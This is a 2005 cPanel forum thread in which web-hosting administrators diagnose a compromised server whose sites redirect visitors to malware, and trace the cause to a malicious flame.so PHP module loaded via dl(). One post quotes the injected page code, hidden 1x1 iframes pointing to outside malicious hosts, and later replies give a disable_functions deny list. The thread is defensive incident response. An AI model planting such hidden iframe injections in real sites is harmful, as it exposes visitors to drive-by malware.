The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Server hacked and sites redirected

Discussion in 'General Discussion' started by php-dawg, May 5, 2005.

  1. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    All the sites on one of our servers has been redirected to a site that downloads viruses to the local computer trying to view the site. It is causing http errors everywhere. One minute a site can be seen without a problem, but then suddenly apache gets to where it can not find the pages any longer for any of the sites. Then if you go out of the browser and back into the site, you will get a pop-up and a re-direct which then tries to download software and viruses on your computer.

    There is nothing in my tmp directory, it is set to noexec. I checked all my ports and can not find anything out of the ordinary. The files do not seem to reside on our server, it looks almost like they have high jacked bind or our IP addresses. The default site on the server works just fine however.

    Some of the sites with dedicated IP addresses seem to work ok if we enter through the dedicated IP address. It only seems to be effecting certain IP addresses on the server.

    Any ideas?
     
  2. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    I'd probably start going into damage control if you don't have a system admin on duty, or available at all. Get a new box, lock it down as best you can and start restoring from remote backup's that you know have not been tainted. You could of course take the time to try and figure it all out, but it might take a little longer this way and your just wasting your clients money and time if you don't know where to go from here. I'd also have someone examine the box and see what went wrong, and see what measures you can employ in future to help avoid such a thing in future.

    My advice, go for a managed dedicated server solution, or hire a competant system administrator, but focus right now on your clients!

    Securing your /tmp is nothing more than a step in the right direction, but it's in now way a solution from hackers or crackers.

    Best of luck and I hope for your sake you have a fast recovery.
     
  3. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    could be an inside job, check your customers and see if you got some dodgy ones !
     
  4. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    I know that the tmp directory is just a start. We have done a lot of server hardening on the boxes that we have. This is the only one that has been compromised. All the sites on the server have been there for over 12 months. We have not been adding customer to this server because it is at its limit. We have been managing cPanel servers for over 3 years and Linux servers for over 7 years. I simply wanted to see if anyone here might have some insight or think of something that we forgot to check.
     
  5. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    Here is the code in the page:

    <html>
    <iframe src='http://url-exchange.net' width=1 height=1></iframe>
    <iframe src='http://toolbarpartner.com/in.php?wm=den' width=1 height=1></iframe>
    <iframe src='http://protraff.us/top/index.html' width=1 height=1></iframe>
    </html>
     
  6. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    The most likely suspect is going to be a vulnerable PHP script or application. Have you checked the versions of any php apps on that account (esp phpBB) plus any other php pages? Often the clues will be in the apache errorlog if you can pinpoint the date and time that the alterations were made.

    There are plenty of other possibilities, e.g. guessed FTP password (evidence should be in your FTP logs); guessed password and cPanel File Manager used (not much evidence likely); all the way up to an OS compromise on the server.
     
  7. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    Yeah, that is the fun part, there is nothing in my error_log file for apache pointing to anything weird. All phpBB boards are up to date. I guess this server is dead.
     
  8. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    Update, I found that if I suspend one account on the main IP for the server, all accounts get suspended that are using that IP address. Would this be an .htaccess file somewhere?
     
  9. PeteC

    PeteC Well-Known Member

    Joined:
    May 8, 2003
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Texas
    I have the same exact symptoms on one server since yesterday evening. Please share anything you find.

    I have discovered that after an Apache restart, it takes a minute or more for the redirecting to start up.

    As a lame interim solution I'm restarting Apache every minute and that makes users think things are OK. I am likely going to pull all sites off the server unless I can find a security guru who can find and fix this problem for me.

    I have done a lot of Internet searching, and this seems like a relatively new hack because your post is the first mention I've found anywhere about this.
     
  10. PeteC

    PeteC Well-Known Member

    Joined:
    May 8, 2003
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Texas
    I've unsuccessfully looked all over for an .htaccess file. I don't think that's it.
     
  11. easyhoster1

    easyhoster1 Well-Known Member

    Joined:
    Sep 25, 2003
    Messages:
    659
    Likes Received:
    0
    Trophy Points:
    16
    You may want to check this URL, do you have a backup of your httpd.conf file?

    http://isc.sans.org/diary.php?date=2005-03-13

    One more scripted mass hack

    It seems as if several web sites were modified in yet another mass hack yesterday, similar to the one we've reported two months ago. Most likely, a script was used to amend all web sites hosted on one or more shared servers with a hostile IFRAME, redirecting visitors to hxxp://www.tgp.la/or.html. Don't go there - it's an Adware site, redirecting to places where you maybe should not tread, including a page on realizeit.biz that tries the CHM exploit to drop a present. Checking with a search engine, it looks as if more than 1500 pages have been thus modified. Thanks to ISC reader Roger for letting us know
     
    #11 easyhoster1, May 6, 2005
    Last edited: May 6, 2005
  12. PeteC

    PeteC Well-Known Member

    Joined:
    May 8, 2003
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Texas
    That was a good read, but it's not what's happened on my server. On mine, no files are modified in the web space of individual Web sites.
     
  13. jroes

    jroes Member

    Joined:
    Feb 9, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    try the following:

    updatedb
    slocate flame.php
    slocate flame.so

    If you find it, suspend the accounts that have it, and disable the dl() function in your php.ini

    Google around for flame.so or flame.php.
     
  14. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    This went away for all of Saturday and part of Sunday morning, then it came back worst than ever.

    jroes, thank you for your suggestion, it was exactly where the problem had started. I don't know how you found out about it to begin with, but I did suspend the user account and all the problems went away.
     
  15. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    have a read here which is covering the same issue http://forums.cpanel.net/showthread.php?t=37761&page=2
    so i guess securing your php.ini for this specific exploid is essential
    and the other thing you could do aswell is

    pico /usr/lib/php.ini
    find disable function with
    ctrl+w disable_functions
    and modify it to

    disable_functions = "system,dl,exec"
     
    #15 gorilla, May 9, 2005
    Last edited: May 9, 2005
  16. d4rkl0rd

    d4rkl0rd Active Member

    Joined:
    Feb 23, 2004
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    This is an issue with the dl() function in php. You need to disable the following line in your /usr/lib/php.ini


    --------------------------------
    enable_dl = Off
    --------------------------------

    this is a latest bug with the dl(). Also search for flame.so files, you can use the locate function to find them,

    locate flame.so


    remove them from the server. Probably this 'so' files might have installed under some of your user's /public_html/img directory. After everything is over restart httpd.
     
  17. htmlhost

    htmlhost Registered

    Joined:
    Dec 23, 2004
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Thanks d4rkl0rd,

    Your solution worked perfectly for me... :)
     
Loading...

Share This Page